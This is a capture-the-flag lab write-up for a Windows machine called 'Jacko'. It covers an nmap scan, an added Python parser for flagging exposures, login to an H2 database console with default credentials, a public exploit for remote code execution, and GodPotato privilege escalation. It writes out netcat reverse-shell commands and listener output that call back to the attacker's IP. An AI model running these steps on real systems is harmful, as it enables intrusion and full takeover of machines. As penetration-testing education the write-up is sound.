
Jacko

Machine Information

  • Machine Name: Jacko
  • Machine Difficulty: Intermediate

Information Gathering

Classic nmap time

Nmap scan report for 192.168.140.66
Host is up, received user-set (0.018s latency).
Scanned at 2024-10-03 22:07:04 +08 for 616s
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
5040/tcp  open  unknown       syn-ack ttl 125
8082/tcp  open  http          syn-ack ttl 125 H2 database http console
9092/tcp  open  XmlIpcRegSvc? syn-ack ttl 125
49664/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
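
As an added example (not part of the original writeup), here is a small Python parser for nmap's normal output in the shape shown above. It turns the port table into records and flags the exposures a hardening review would call out on this host: the H2 web console reachable over the network, the TRACE method on IIS, and SMB. The sample input is a constructed excerpt of the scan shown on this page.

```python
import re

# Constructed sample, an excerpt of the nmap output shown on this page
# (run with --reason, hence the "syn-ack ttl N" column).
NMAP_OUTPUT = """\
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 125
8082/tcp  open  http          syn-ack ttl 125 H2 database http console
9092/tcp  open  XmlIpcRegSvc? syn-ack ttl 125
"""

# port/proto, state, service, reason (with optional "ttl N"), then free-text version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+(?: ttl \d+)?)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port line; NSE script lines ("|") attach to the last port."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(6).strip(), "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def findings(ports):
    """Flag exposures a defender would want fixed; returns (port, message) tuples."""
    out = []
    for p in ports:
        if p["state"] != "open":
            continue
        if "h2 database http console" in p["version"].lower():
            out.append((p["port"], "H2 web console reachable from the network: "
                        "bind it to localhost and replace the default credentials"))
        risky = [s for s in p["scripts"] if s.startswith("Potentially risky methods:")]
        if risky:
            out.append((p["port"], "risky HTTP methods enabled: " + risky[0].split(":", 1)[1].strip()))
        if p["port"] == 445:
            out.append((p["port"], "SMB exposed: restrict with the host firewall if not required"))
    return out
```

Run `findings(parse_ports(NMAP_OUTPUT))` to get the three findings for the sample; the same parser accepts a full `nmap -sV --reason` report.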

Port 8082 is open and serving a website. Let's start with that port.

Port 8082

Looking at the website, it's a login page for a database.

Based on the nmap result, the service on this port is the "H2 database http console", so make sure to check for existing exploits using this valuable information. After searching on Google, I found https://www.exploit-db.com/exploits/45506 and https://www.exploit-db.com/exploits/49384, each of which targets a specific version. Since I had no idea which exploit to use, I tried to log in using the default credentials, which are autocompleted by default. The login succeeded, and I noticed a version number on the page.

The version number is "H2 1.4.199", which means the exploit that will work is https://www.exploit-db.com/exploits/49384. After reading the exploit, it basically writes a DLL file onto the machine and uses it to execute commands.

After replicating the exploit, it worked and I managed to execute commands. So it's time to get a reverse shell from here. I uploaded nc.exe and got a reverse shell using my own nc.exe.

Although there were some errors here, it still worked and the file was saved to the path.

rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.210] from (UNKNOWN) [192.168.188.66] 49877
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\H2\service>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

I managed to get a shell, but somehow the whoami command is missing. Based on the earlier POC, the current user is not a high-privilege user, so I'll need to perform privilege escalation.

Privilege Escalation

Since the reverse shell does not have the whoami command, I checked the privileges through the website instead.

According to this result, the current user has the SeImpersonatePrivilege privilege. Time for some potato attacks. The exploit I'll be using is GodPotato. Just upload it to the system and execute it to get a high-privilege user.

C:\Users\Public>.\god4.exe -cmd "C:\Users\Public\nc.exe 192.168.45.210 1235 -e cmd"
.\god4.exe -cmd "C:\Users\Public\nc.exe 192.168.45.210 1235 -e cmd"
[*] CombaseModule: 0x140731985952768
[*] DispatchTable: 0x140731988295264
[*] UseProtseqFunction: 0x140731987662864
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\6545f493-8d8a-4ded-bb1e-164a66f8149a\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006c02-03e4-ffff-4f73-483404336800
[*] DCOM obj OXID: 0xd810e5ae3711fbbe
[*] DCOM obj OID: 0xa46e38127aeec715
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 788 Token:0x772  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3136
rlwrap nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.210] from (UNKNOWN) [192.168.188.66] 49949
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami

Although I still could not run the whoami command, I could read everything in the Administrator folder, which means I am now a high-privilege user~

Things I learned from this machine

  • An error does not always mean code execution failed.
  • Getting the specific version number is crucial.
  • Try harder ~
This post is licensed under CC BY 4.0 by the author.
